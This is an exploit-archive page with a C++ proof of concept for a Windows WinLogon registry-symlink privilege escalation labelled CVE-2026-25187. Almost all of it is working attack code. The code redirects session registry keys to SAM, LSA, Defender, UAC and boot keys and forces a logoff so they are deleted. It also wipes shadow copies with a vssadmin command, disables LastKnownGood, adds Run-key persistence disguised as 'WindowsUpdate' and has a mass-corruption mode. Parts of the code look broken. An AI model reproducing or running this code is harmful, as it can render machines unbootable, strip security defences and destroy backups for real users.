Share
## https://sploitus.com/exploit?id=PACKETSTORM:219937
==================================================================================================================================
| # Title : WinLogon Registry Deletion Exploit Privilege Escalation PoC |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : This code represents a highly destructive proof-of-concept CVE-2026-25187 targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise.
The exploit is built around abusing Registry symbolic links and session-based Accessibility paths to redirect sensitive system keys into locations affected during user logoff or session transitions.
[+] POC :
#include <Windows.h>
#include <comdef.h>
#include <stdio.h>
#include <vector>
#include <string>
#include <map>
#include <thread>
#include <chrono>
#include <sddl.h>
#include <winternl.h>
#include <aclapi.h>
#include <lm.h>
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "netapi32.lib")
#define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)
#define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)
extern "C" {
NTSTATUS NTAPI NtCreateKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,
PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG Disposition
);
NTSTATUS NTAPI NtOpenKeyEx(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG OpenOptions
);
NTSTATUS NTAPI NtSetValueKey(
HANDLE KeyHandle,
PUNICODE_STRING ValueName,
ULONG TitleIndex,
ULONG Type,
PVOID Data,
ULONG DataSize
);
NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);
NTSTATUS NTAPI NtOpenKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes
);
NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);
VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
}
class RegistryUtils {
public:
static std::wstring GetUserSid() {
HANDLE hToken = nullptr;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
return L"";
DWORD dwSize = 0;
GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwSize);
std::vector<BYTE> buffer(dwSize);
if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, &dwSize)) {
CloseHandle(hToken);
return L"";
}
PTOKEN_USER pTokenUser = reinterpret_cast<PTOKEN_USER>(buffer.data());
LPWSTR lpSid = nullptr;
if (!ConvertSidToStringSid(pTokenUser->User.Sid, &lpSid)) {
CloseHandle(hToken);
return L"";
}
std::wstring sid(lpSid);
LocalFree(lpSid);
CloseHandle(hToken);
return sid;
}
static std::wstring RegPathToNative(const std::wstring& path) {
std::wstring regpath = L"\\Registry\\";
if (path.empty() || path[0] == L'\\')
return path;
if (path.find(L"HKLM\\") == 0) {
return regpath + L"Machine\\" + path.substr(5);
}
else if (path.find(L"HKU\\") == 0) {
return regpath + L"User\\" + path.substr(4);
}
else if (path.find(L"HKCU\\") == 0) {
return regpath + L"User\\" + GetUserSid() + L"\\" + path.substr(5);
}
else if (path.find(L"HKCR\\") == 0) {
return regpath + L"Machine\\Software\\Classes\\" + path.substr(5);
}
return L"";
}
static bool CreateRegistrySymlink(const std::wstring& symlink, const std::wstring& target, bool isVolatile) {
std::wstring nativeSymlink = RegPathToNative(symlink);
std::wstring nativeTarget = RegPathToNative(target);
if (nativeSymlink.empty() || nativeTarget.empty())
return false;
printf("[*] Creating symlink: %ls -> %ls\n", nativeSymlink.c_str(), nativeTarget.c_str());
DeleteRegistrySymlink(symlink);
UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());
OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
HANDLE hKey = nullptr;
ULONG disposition = 0;
ULONG options = INTERNAL_REG_OPTION_CREATE_LINK |
(isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);
NTSTATUS status = NtCreateKey(&hKey, KEY_ALL_ACCESS, &objAttr, 0, nullptr, options, &disposition);
if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}
UNICODE_STRING valueName;
RtlInitUnicodeString(&valueName, L"SymbolicLinkValue");
status = NtSetValueKey(hKey, &valueName, 0, REG_LINK,
(PVOID)nativeTarget.c_str(),
nativeTarget.length() * sizeof(WCHAR));
CloseHandle(hKey);
if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}
printf("[+] Symlink created successfully\n");
return true;
}
static bool DeleteRegistrySymlink(const std::wstring& symlink) {
std::wstring nativeSymlink = RegPathToNative(symlink);
if (nativeSymlink.empty())
return false;
UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());
OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);
HANDLE hKey = nullptr;
NTSTATUS status = NtOpenKeyEx(&hKey, DELETE, &objAttr, 0);
if (status != 0) {
return true;
}
status = NtDeleteKey(hKey);
CloseHandle(hKey);
return status == 0;
}
static bool DeleteRegistryTreeManual(HKEY rootKey, const std::wstring& subKey) {
HKEY hKey = nullptr;
if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ | KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
return false;
}
DWORD index = 0;
WCHAR valueName[256];
DWORD valueNameSize = 256;
while (RegEnumValueW(hKey, index++, valueName, &valueNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
RegDeleteValueW(hKey, valueName);
valueNameSize = 256;
index--;
}
index = 0;
WCHAR subKeyName[256];
DWORD subKeyNameSize = 256;
while (RegEnumKeyExW(hKey, index++, subKeyName, &subKeyNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
std::wstring fullPath = subKey + L"\\" + subKeyName;
DeleteRegistryTreeManual(rootKey, fullPath);
subKeyNameSize = 256;
index--;
}
RegCloseKey(hKey);
return RegDeleteKeyW(rootKey, subKey.c_str()) == ERROR_SUCCESS;
}
};
class WinLogonEoPExploit {
private:
std::wstring m_sessionPath;
std::vector<std::pair<std::wstring, std::wstring>> m_targets;
bool m_persistentMode;
void InitializeTargets() {
m_targets = {
{L"uac_bypass", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"},
{L" defender", L"HKLM\\SOFTWARE\\Microsoft\\Windows Defender"},
{L"security_policies", L"HKLM\\SECURITY\\Policy"},
{L"lsa_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"},
{L"sam_key", L"HKLM\\SAM\\SAM\\Domains\\Account"},
{L"cached_creds", L"HKLM\\SECURITY\\Cache"},
{L"ci_policies", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\CI\\Policy"},
{L"code_integrity", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard"},
{L"uac_settings", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\UAC"},
{L"boot_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Boot"},
{L"winlogon", L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"},
{L"critical_services", L"HKLM\\SYSTEM\\CurrentControlSet\\Services"},
};
}
std::wstring BuildSessionPath() {
DWORD sessionId = 0;
ProcessIdToSessionId(GetCurrentProcessId(), &sessionId);
wchar_t path[512];
swprintf_s(path, L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session%d\\ATConfig",
sessionId);
return std::wstring(path);
}
bool PrepareRegistryTarget(const std::wstring& targetPath) {
printf("[*] Preparing target: %ls\n", targetPath.c_str());
std::wstring nativeTarget = RegistryUtils::RegPathToNative(targetPath);
if (nativeTarget.empty()) {
printf("[!] Invalid target path\n");
return false;
}
HKEY hKey = nullptr;
std::wstring cleanPath = targetPath;
if (cleanPath.find(L"HKLM\\") == 0) {
cleanPath = cleanPath.substr(5);
}
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr,
&hKey, nullptr) == ERROR_SUCCESS) {
DWORD dummy = 0xDEADBEEF;
RegSetValueExW(hKey, L"exploit_marker", 0, REG_DWORD,
(BYTE*)&dummy, sizeof(dummy));
RegCloseKey(hKey);
printf("[+] Target key created/verified\n");
}
return true;
}
bool CreateMaliciousSymlink(const std::wstring& targetPath) {
printf("\n[*] Creating malicious registry symlink...\n");
std::wstring pathWithoutHKLM = m_sessionPath;
if (pathWithoutHKLM.find(L"HKLM\\") == 0) {
pathWithoutHKLM = pathWithoutHKLM.substr(5);
}
RegDeleteTreeW(HKEY_LOCAL_MACHINE, pathWithoutHKLM.c_str());
if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {
printf("[!] Failed to create symlink: %d\n", GetLastError());
return false;
}
return true;
}
bool TriggerLogout() {
printf("\n[*] Triggering user logout...\n");
BOOL result = FALSE;
result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
if (result) {
printf("[+] Logout initiated via ExitWindowsEx\n");
return true;
}
result = InitiateSystemShutdownExW(nullptr, L"System will logout for maintenance",
5, TRUE, TRUE,
SHTDN_REASON_MAJOR_APPLICATION);
if (result) {
printf("[+] Logout initiated via InitiateSystemShutdownEx\n");
return true;
}
HANDLE hToken = nullptr;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
TOKEN_PRIVILEGES tp;
LUID luid;
if (LookupPrivilegeValueW(nullptr, SE_SHUTDOWN_NAME, &luid)) {
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, 0, nullptr, 0);
}
CloseHandle(hToken);
}
result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
return result != FALSE;
}
void DisableRecoveryMechanisms() {
printf("[*] Disabling recovery mechanisms...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Configuration Manager",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disable = 1;
RegSetValueExW(hKey, L"LastKnownGoodEnabled", 0, REG_DWORD,
(BYTE*)&disable, sizeof(disable));
RegCloseKey(hKey);
}
system("vssadmin delete shadows /all /quiet > nul 2>&1");
}
public:
WinLogonEoPExploit(bool persistentMode = false)
: m_persistentMode(persistentMode) {
InitializeTargets();
}
bool ExploitSingleTarget(const std::wstring& targetName, const std::wstring& targetPath) {
printf("\n=== Attacking target: %ls ===\n", targetName.c_str());
if (!PrepareRegistryTarget(targetPath))
return false;
if (!CreateMaliciousSymlink(targetPath))
return false;
if (!TriggerLogout()) {
printf("[!] Failed to trigger logout\n");
return false;
}
return true;
}
bool ExploitMultipleTargets() {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - WinLogon EoP Exploit\n");
printf(" Registry Deletion to SYSTEM\n");
printf("========================================\n\n");
m_sessionPath = BuildSessionPath();
printf("[*] Session path: %ls\n", m_sessionPath.c_str());
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (m_persistentMode) {
AddPersistence();
}
DisableRecoveryMechanisms();
printf("\n[*] Available targets:\n");
for (size_t i = 0; i < m_targets.size(); i++) {
printf(" [%zu] %ls - %ls\n", i, m_targets[i].first.c_str(), m_targets[i].second.c_str());
}
printf("\n[*] Targeting all critical keys for maximum impact...\n");
for (const auto& target : m_targets) {
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (CreateMaliciousSymlink(target.second)) {
printf("[+] Symlink created for %ls\n", target.first.c_str());
Sleep(100);
}
}
printf("\n[*] Triggering final logout for mass deletion...\n");
TriggerLogout();
return true;
}
void AddPersistence() {
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_CURRENT_USER,
L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
wchar_t path[MAX_PATH];
GetModuleFileNameW(nullptr, path, MAX_PATH);
RegSetValueExW(hKey, L"WindowsUpdate", 0, REG_SZ,
(BYTE*)path, (wcslen(path) + 1) * sizeof(wchar_t));
RegCloseKey(hKey);
printf("[+] Persistence added to HKCU\\Run\n");
}
}
bool CreateMassiveRegistryCorruption() {
printf("\n[*] Creating massive registry corruption...\n");
std::vector<std::wstring> extraTargets = {
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Executive",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL",
L"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System",
L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
};
for (const auto& target : extraTargets) {
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (RegistryUtils::CreateRegistrySymlink(m_sessionPath, target, true)) {
printf("[+] Corruption symlink created for: %ls\n", target.c_str());
Sleep(50);
}
}
return true;
}
};
class PrivilegeEscalation {
public:
static bool DisableUAC() {
printf("[*] Disabling UAC...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disable = 0;
RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
RegSetValueExW(hKey, L"ConsentPromptBehaviorAdmin", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
RegCloseKey(hKey);
printf("[+] UAC disabled (requires reboot)\n");
return true;
}
return false;
}
static bool GrantDebugPrivileges() {
printf("[*] Granting debug privileges...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SECURITY\\Policy\\Privileges",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
RegCloseKey(hKey);
return true;
}
return false;
}
};
int wmain(int argc, wchar_t* argv[]) {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - Critical EoP Exploit\n");
printf(" WinLogon Registry Deletion to SYSTEM\n");
printf("========================================\n\n");
bool massDeletion = false;
bool persistent = false;
int targetIndex = -1;
for (int i = 1; i < argc; i++) {
if (_wcsicmp(argv[i], L"--mass") == 0) {
massDeletion = true;
}
else if (_wcsicmp(argv[i], L"--persist") == 0) {
persistent = true;
}
else if (_wcsicmp(argv[i], L"--target") == 0 && i + 1 < argc) {
targetIndex = _wtoi(argv[++i]);
}
else if (_wcsicmp(argv[i], L"--help") == 0) {
printf("Usage: %s [options]\n", argv[0]);
printf("Options:\n");
printf(" --mass Mass delete multiple critical keys\n");
printf(" --persist Add persistence to startup\n");
printf(" --target N Attack specific target by index\n");
printf(" --disable-uac Disable UAC after deletion\n");
printf("\nWARNING: This exploit will cause system instability!\n");
return 0;
}
}
printf("[!] WARNING: This exploit will delete critical registry keys!\n");
printf("[!] System may become UNBOOTABLE or severely damaged.\n");
printf("[!] Continue? (y/N): ");
wint_t ch = towlower(getwchar());
if (ch != L'y') {
printf("[*] Exploit aborted.\n");
return 0;
}
WinLogonEoPExploit exploit(persistent);
bool success = false;
if (massDeletion) {
printf("\n[*] Running mass deletion mode...\n");
success = exploit.ExploitMultipleTargets();
exploit.CreateMassiveRegistryCorruption();
} else {
printf("\n[*] Available targets:\n");
printf(" 0 - UAC Bypass (Disable UAC)\n");
printf(" 1 - Windows Defender\n");
printf(" 2 - Security Policies\n");
printf(" 3 - LSA Configuration\n");
printf(" 4 - SAM (Password Hashes)\n");
printf(" 5 - Cached Credentials\n");
printf(" 6 - Code Integrity\n");
printf(" 7 - Boot Configuration (DoS)\n");
printf(" 8 - ALL (Mass Deletion)\n");
int choice = targetIndex;
if (choice == -1) {
printf("\n[*] Select target (0-8): ");
wscanf_s(L"%d", &choice);
}
if (choice == 8) {
success = exploit.ExploitMultipleTargets();
} else if (choice >= 0 && choice < 8) {
auto& target = exploit.m_targets[choice];
success = exploit.ExploitSingleTarget(target.first, target.second);
if (choice == 0) {
PrivilegeEscalation::DisableUAC();
}
}
}
if (success) {
printf("\n[+] Exploit triggered! System will logout now.\n");
printf("[*] After login, check if target registry keys are deleted.\n");
Sleep(2000);
} else {
printf("\n[!] Exploit failed. Try running again or use different target.\n");
}
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================